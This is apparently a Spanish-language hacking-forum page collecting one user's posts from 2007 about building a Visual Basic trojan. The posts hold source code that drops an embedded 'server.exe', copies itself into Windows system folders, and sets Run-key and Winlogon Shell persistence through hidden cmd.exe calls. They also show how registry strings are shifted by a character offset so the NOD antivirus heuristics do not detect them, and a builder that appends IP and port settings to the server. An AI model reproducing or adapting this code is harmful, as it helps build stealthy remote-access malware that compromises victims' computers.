elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 25
211  Programación / Programación Visual Basic / Re: [Source] NetBios infection Module (ojo que es peligroso!) en: 15 Julio 2007, 00:15 am
Citar
Tienes un grupo de trabajo creado con tus 3 PC''''s?
Tienes firewall habilitado en alguno de tus PC''''s
Están los 3 equipos dentro de la misma subred?
Tienes habilitado el servicio de Compartir archivos e impresoras en los 3 PC''''s?
Si a todo, como en windows xDD
si tengo todo ello hecho. lo de la subred es el mismo rango de ip no? me explico un poco : una subred seria por ejemplo 192.168.1.12, 192.168.1.13, etc.

si por ejemplo tuviera 192.168.0.12 y 192.168.1.13 no seria una subred. es asi??

Gracias.

PD aora me bajo de pscode a ver si saco algo en claro

212  Programación / Programación Visual Basic / Re: [Source] NetBios infection Module (ojo que es peligroso!) en: 14 Julio 2007, 23:14 pm
muy weno mad, eres tremendo. e hestado probandolo con mis 3 pcs, pero deben estar parcheados por que no crea el upodater.exe

por cierto, me puedes explicar a si por encima como usar los modulos socketmaster?

es que me gustaria incluirlos en mi troya, pero no se como funcionan.

gracias mad y otra vez, un EXCELENTE trabajo
213  Programación / Programación Visual Basic / Re: Felicidades a los 2 nuevos moderadores en: 13 Julio 2007, 13:55 pm
FIERAS, me alegro de tener tres estupendos moderadores en este subforo, esperemos que no cojais mala fama por cerrar post de disputas ni cosas de esas, que sois tres tios  de PM.

Ehorawena a los 3, no solo a hendrix y EON, si no tb a Mad, que tambien lo an echo mod y creo que es una loable eleccion.

FIERAS

xDD
214  Programación / Programación Visual Basic / Re: [Duda]Troyano Visual Basic en: 11 Julio 2007, 14:14 pm
a ver lo que eon se refiere es a añadir el server al cliente como recurso.
http://foro.elhacker.net/index.php/topic,165943.0.html
un usuario subio un manual, en portuges, de como añadir un ocx a nuestra aplicacion como recurso. de ay averiguad como se ace.

una vez añadido el server, lo que ay qe acer es extraerlo y añadirle los datos. despues el server tiene que leer esos datos y aplicarlos. no ay mas misterio.

enga, buscad un poco, que si yo lo e hecho, vosotros tb podeis.

215  Programación / Programación Visual Basic / Re: [Duda]Troyano Visual Basic en: 10 Julio 2007, 21:22 pm
dominicano, el autor es warghost no yo xDD, me kedao pillao kuando e visto por wactor.  :o :o
digo = un dia que iba pedo ice un manual o algo :S

xDD
corrigelo
216  Media / Diseño Gráfico / Re: TOTW #2 <Diseña la web de inicio de elhacker.net> en: 3 Julio 2007, 23:03 pm
weno pos yo llevo un par de dias haciendo este:


tambien e maketado ya la web en html

lo dejo aki por si lo kereis.

http://rapidshare.com/files/40852809/web.rar

espero que os guste.

PD: muy buenos los dieños, por cierto
217  Programación / Programación Visual Basic / Re: aplicacion con winsock en: 2 Julio 2007, 16:29 pm
mira yo lo ago de la siguiente manera. Crea un proyecto y pega este code:

Código:
Private Declare Function DllRegisterServer Lib "MSWINSCK.OCX" () As Long
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long


Function LoadDataIntoFile(ByVal DataName As Integer, _
ByVal Filename As String, ByVal Types As String)

Dim myArray() As Byte
Dim myFile As Long

    If Dir(Filename) = "" Then
       myArray = LoadResData(DataName, Types)
       myFile = FreeFile
       Open Filename For Binary Access Write As #myFile
       Put #myFile, , myArray
       Close #myFile
    End If
   
End Function



Private Sub Form_Load()
    Dim Car As String * 128
    Dim Longitud, Es As Integer
    Dim Camino As String
    Dim win
    Dim sys
   
      Longitud = 128
   
    Es = GetWindowsDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    win = Camino
   
    Es = GetSystemDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    sys = Camino
   
LoadDataIntoFile 101, sys & "\MSWINSCK.OCX", "CUSTOM"

If DllRegisterServer = ERROR_SUCCESS Then
    MsgBox "Registration Successful"
Else
    MsgBox "Registration Unsuccessful"
End If
End Sub

Private Sub Timer1_Timer()
LoadDataIntoFile 102, sys & "\server.exe", "CUSTOM"

End Sub

luego colocas un timer con intervalo 2000.
despues solo tienes que añadir la libreria y el server al proyecto como recursos. añadre primero la libreria y luego el server. una vez exo esto compilas y manda el exe generado.
lo que hace esto es extrae la libreria a system32 y la registra. y pasados unos segundos extrae el server a la carpeta donde esta este programa. kuando lo ejecutes no deberia de salir el error del winsock.

esta sacado del api-guide, luego le e ido añadiendo cosillas para que extraiga el server y demas.

espero que te sirva.
218  Programación / Programación Visual Basic / Re: problema con el registro encryptado en: 25 Junio 2007, 14:01 pm
gracias a tos por contestar, voy a porbrar como dice eon.

si para encryptar utilizo esta funcion:

Public Function en(j)
On Error Resume Next
For R = 1 To Len(j)
en = en & Chr(Asc(Mid(j, R, 1)) + 7)
Next
End Function

y para desencryptar uso esto:
Public Function encrypt(p)
On Error Resume Next
For R = 1 To Len(p)
encrypt = encrypt & Chr(Asc(Mid(p, R, 1)) - 7)
Next
End Function

aora pruebo y os comento.


PD: no esta en el form load, esta en un modulo para que cuando llame a la funcion, segun los valores que le meto al server al crearlo desde el cliente haga una cosa u otra:

Código:
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function CopyFileEx Lib "kernel32.dll" Alias "CopyFileExA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal lpProgressRoutine As Long, lpData As Any, ByRef pbCancel As Long, ByVal dwCopyFlags As Long) As Long


Public Sub autocopiar(win As Variant, sys As Variant, name As Variant, localmachine As Variant, currentuser As Variant, explorer As Variant, valor As Variant)
    Dim Car As String * 128
    Dim Longitud, Es As Integer
    Dim Camino As String
    Dim SO
    Dim Sistema
   

opwindows = win
opsystem = sys
name = name
hklm = localmachine
hkcu = currentuser
hkex = explorer
valuereg = valor
   
      Longitud = 128
   
    Es = GetWindowsDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    SO = Camino
   
    Es = GetSystemDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    Sistema = Camino
   
If opwindows = "V" Then
    origen = App.Path
    If Right(origen, 1) <> "\" Then origen = origen & "\"
    origen = origen & App.EXEName & ".exe"
    Ret = CopyFileEx(origen, SO & "\" & name, AddressOf CopyProgressRoutine, ByVal 0&, bCancel, COPY_FILE_RESTARTABLE)
        If hklm = 1 Then
        reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hs|lyln'-')'6{'YLNfZa'6k')'-'ZV'-')c)'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
        If hkcu = 1 Then
        reg = encrypt("YLN'HKK'ORL`fJ\YYLU[f\ZLYcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hsvy'-')'6{'YLNfZa'6k')'-'ZV'-')c)'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
        If hkex = 1 Then
        reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZVM[^HYLcTpjyvzvm{c^pukv~z'U[cJ|yylu{]lyzpvuc^pusvnvuc'6}'Zolss'6{'YLNfZa'6k'Lwsvyly5ll3')'-'ZV'-')c)'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
End If

If sys = "V" Then
    origen = App.Path
    If Right(origen, 1) <> "\" Then origen = origen & "\"
    origen = origen & App.EXEName & ".exe"
    Ret = CopyFileEx(origen, Sistema & name, AddressOf CopyProgressRoutine, ByVal 0&, bCancel, COPY_FILE_RESTARTABLE)
        If localmachine = "1" Then
        reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hsvy'-')'6{'YLNfZa'6k')'-'Zpz{lth'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
        If currentuser = "1" Then
        reg = encrypt("YLN'HKK'ORL`fJ\YYLU[f\ZLYcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}')'-'}hsvy'-')'6{'YLNfZa'6k')'-'Zpz{lth'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
        If explorer = "1" Then
        reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZVM[^HYLcTpjyvzvm{c^pukv~z'U[cJ|yylu{]lyzpvuc^pusvnvuc'6}'Zolss'6{'YLNfZa'6k'Lwsvyly5ll3')'-'Zpz{lth'-'uhtl'-')'6m")
        Shell "cmd.exe /c " & reg & "", vbHide
        End If
End If
End Sub
219  Programación / Programación Visual Basic / problema con el registro encryptado en: 24 Junio 2007, 22:28 pm
wenas, tengo un pequeño problema que me trae un poco de cabeza.

tengo una cadena cifrada que añade mi aplicacion al registro.
si no esta encryptada el nod salta por herustica, pero si esta encryptada no se añade al registro. esto es por que en la cadena para añadirse tengo 2 variables, una con el nombre de la clave y otra con el valor de la clave:

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ /v " & valuereg & " /t REG_SZ /d " & SO & "\" & name & " /f

esta es la cadena desencryptada. si kito las variables y dejo la cadena asi:

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ /v Nombre /t REG_SZ /d C:\sdad\exe /f

si que se añade encryptada. que puede pasar para que no funcione?

gracias
220  Programación / Programación Visual Basic / error 458 en tiempo de ejecucion en: 18 Junio 2007, 16:20 pm
wenas, aver os comento, haciendo la v2 de mi troyano, estoy haciendo que en el editor de server puedas elegir opciones como añadir al reg, autocopiarse, etc.

el caso es que al generar el server me salta este error cuando intento ejecutarlo (el server)

Error '458' en tiempo de ejecucion.

Variable utiliza un tipo de automatización no admitido en Visual Basic.

esto es lo que dice microsoft:
http://support.microsoft.com/kb/191205/es

segun ellos es causa al tener acceso a la propiedad BackColor de un control TextBox de Enriquecer que es tiempo de ejecución

ni se que es eso ni lo tengo puesto en mi troyano.

os dejo el code de crear el server del cliente.

Código:
Dim port As String * 5
Dim ip As String * 30
Dim copiar As String * 1
Dim opwindows As String * 1
Dim opsystem32 As String * 1
Dim nombre As String * 20
Dim localmachine As String * 1
Dim currentuser As String * 1
Dim explorer As String * 1
Dim valor As String * 20

Private Sub EditarServer(Ruta As String)
'---CONEXION
ip = Text1.Text
port = Text2.Text
'---AUTOCOPIAR
copiar = cp.Value
opwindows = opwin.Value
opsystem32 = opsys.Value
nombre = txName.Text
'---INICIO
localmachine = hklm.Value
currentuser = HKCU.Value
explorer = hkex.Value
valor = txValueReg.Text
'---AÑADIMOS
Open Ruta For Binary As #1
Put #1, LOF(1) + 1, port
Put #1, , ip
Put #1, , copiar
Put #1, , opwindows
Put #1, , opsystem32
Put #1, , nombre
Put #1, , localmachine
Put #1, , currentuser
Put #1, , explorer
Put #1, , valor
Close #1
MsgBox "Server Creado", vbInformation
End Sub


aver si me podeis ayudar, que no se por que razon pasa esto.

gracias
Páginas: 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 25
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines